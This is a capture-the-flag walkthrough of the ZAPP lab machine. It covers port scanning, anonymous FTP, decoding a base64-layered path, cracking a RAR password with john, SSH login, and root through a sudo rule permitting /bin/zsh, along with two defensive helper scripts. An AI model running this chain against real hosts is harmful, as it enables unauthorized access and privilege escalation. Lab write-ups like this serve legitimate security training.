ZAPP

Information Gathering

10.156.131.242

Port Scan

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 10.156.131.242                                                                    [20:33:24]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.242:21
Open 10.156.131.242:22
Open 10.156.131.242:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:33 CST
Initiating ARP Ping Scan at 20:33
Scanning 10.156.131.242 [1 port]
Completed ARP Ping Scan at 20:33, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:33
Completed Parallel DNS resolution of 1 host. at 20:33, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:33
Scanning 10.156.131.242 [3 ports]
Discovered open port 80/tcp on 10.156.131.242
Discovered open port 22/tcp on 10.156.131.242
Discovered open port 21/tcp on 10.156.131.242
Completed SYN Stealth Scan at 20:33, 0.02s elapsed (3 total ports)
Nmap scan report for 10.156.131.242
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-22 20:33:31 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:87:1D:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Port 21 Scan

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  nmap 10.156.131.242 -p 21 -sC                                                                 [20:40:57]
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:41 CST
Nmap scan report for 10.156.131.242
Host is up (0.00051s latency).

PORT STATE SERVICE
21/tcp open ftp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.156.131.149
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 28 Oct 29 20:59 login.txt
|_-rw-r--r-- 1 0 0 65 Oct 29 21:23 secret.txt
MAC Address: 08:00:27:87:1D:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.87 seconds

Anonymous login is allowed.

lftp 10.156.131.242 -u anonymous

It is not clear yet what these are for, so set them aside for now.

80/tcp

This part of the home page looks promising.

The home page source also contains a string that has been base64-encoded several times over.

Decode it with CyberChef.

Testing shows that the decoded value is a directory.
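The layered decoding done in CyberChef above can also be scripted. This is an added example, not part of the original write-up; the page does not show the encoded string, so `SAMPLE` is a constructed value wrapping a hypothetical path, and `wrap` and `peel_base64` are names chosen here.

```python
import base64
import binascii


def wrap(value, times):
    """Build a constructed sample by base64-encoding value `times` times."""
    for _ in range(times):
        value = base64.b64encode(value.encode("ascii")).decode("ascii")
    return value


def peel_base64(text, max_layers=20):
    """Return every layer, outermost first, ending with the innermost value."""
    layers = [text.strip()]
    for _ in range(max_layers):
        current = layers[-1]
        # Valid padded base64 is non-empty and a multiple of 4 characters long.
        if not current or len(current) % 4 != 0:
            break
        try:
            # validate=True rejects characters outside the base64 alphabet
            # instead of silently discarding them.
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        # Binary or control characters mean the previous layer was the payload.
        if not decoded.isprintable():
            break
        layers.append(decoded.strip())
    return layers


# Constructed sample: a hypothetical path wrapped three times.
SAMPLE = wrap("/constructed-dir/", 3)

if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(SAMPLE)):
        print(depth, layer)
```

All layers are returned because a plaintext that happens to be valid base64 of printable ASCII would be decoded one step too far; the previous layer is then the real value.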

A password is required.

RAR Password Cracking

rar2john Sup3rP4ss.rar > hash
john --format=rar5 --wordlist=/usr/share/wordlists/rockyou.txt hash

Extraction

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  unrar x Sup3rP4ss.rar                                                                         [20:51:06]

UNRAR 7.20 beta 2 freeware Copyright (c) 1993-2025 Alexander Roshal

Extracting from Sup3rP4ss.rar

Enter password (will not be echoed) for Sup3rP4ss.txt:


Would you like to replace the existing file Sup3rP4ss.txt
34 bytes, modified on 2025-10-31 04:28
with a new one
34 bytes, modified on 2025-10-31 04:28

[Y]es, [N]o, [A]ll, n[E]ver, [R]ename, [Q]uit y

Extracting Sup3rP4ss.txt OK
All OK

The contents are:

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  cat Sup3rP4ss.txt                                                                             [20:51:15]
Intenta probar con más >> 3spuM4 #

My guess is that this is a password, and that zappskred, found earlier, is the username.

zappskred shell

Trying to log in with these credentials succeeds.

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  ssh zappskred@10.156.131.242                                                                  [20:51:23]
The authenticity of host '10.156.131.242 (10.156.131.242)' can't be established.
ED25519 key fingerprint is: SHA256:oAQDgOtodLYaAEaFPgXG880suuG/9LzdUj9QDUv0CmI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.156.131.242' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
███████╗ █████╗ ██████╗ ██████╗
╚══███╔╝██╔══██╗██╔══██╗██╔══██╗
███╔╝ ███████║██████╔╝██████╔╝
███╔╝ ██╔══██║██╔═══╝ ██╔═══╝
███████╗██║ ██║██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝


zappskred@10.156.131.242's password:
Permission denied, please try again.
zappskred@10.156.131.242's password:
Linux TheHackersLabs-ZAPP 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64

Last login: Sat Nov 1 03:15:28 2025 from 192.168.18.16
ZAPP
+)Creador: puerto4444
+)Nombre: ZAPP
+)IP: 10.156.131.242
----------------------------------------
zappskred@TheHackersLabs-ZAPP:~$

Privilege Escalation

zappskred -> root

zappskred@TheHackersLabs-ZAPP:/opt$ sudo -l
sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
[sudo] password for zappskred:
Matching Defaults entries for zappskred on TheHackersLabs-ZAPP:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zappskred may run the following commands on TheHackersLabs-ZAPP:
(root) /bin/zsh

/bin/zsh can be run as the root user, with no password needed.

GTFOBins has a ready-made method for this:

https://gtfobins.org/gtfobins/zsh/

sudo /bin/zsh
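From the administrator's side, the rule `(root) /bin/zsh` is the finding to catch in a sudoers review. The following is an added example, not part of the original write-up: it parses `sudo -l` output like the one shown above and flags rules that grant a shell or unrestricted `ALL`. The `SHELLS` set and the function name `audit_sudo_l` are assumptions made for this example.

```python
import os
import re

# Assumption: binaries treated as an unrestricted shell when allowed via sudo.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish"}

# The rule section of the `sudo -l` output shown above.
SUDO_L = """\
User zappskred may run the following commands on TheHackersLabs-ZAPP:
    (root) /bin/zsh
"""

# Rule line layout: "(runas) [TAG: ...] command[, command...]"
ENTRY = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_l(output):
    """Return one finding per rule that hands out a shell or ALL."""
    findings = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = ENTRY.match(line) if in_rules else None
        if not match:
            continue
        tags = {t.strip() for t in match["tags"].split(":") if t.strip()}
        # Simplification: commands are split on commas; escaped commas
        # inside command arguments are not handled.
        for cmd in (c.strip() for c in match["cmds"].split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0]
            if binary == "ALL":
                reason = "unrestricted ALL"
            elif os.path.basename(binary) in SHELLS:
                reason = "interactive shell"
            else:
                continue
            findings.append({
                "runas": match["runas"].strip(),
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                "reason": reason,
            })
    return findings
```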
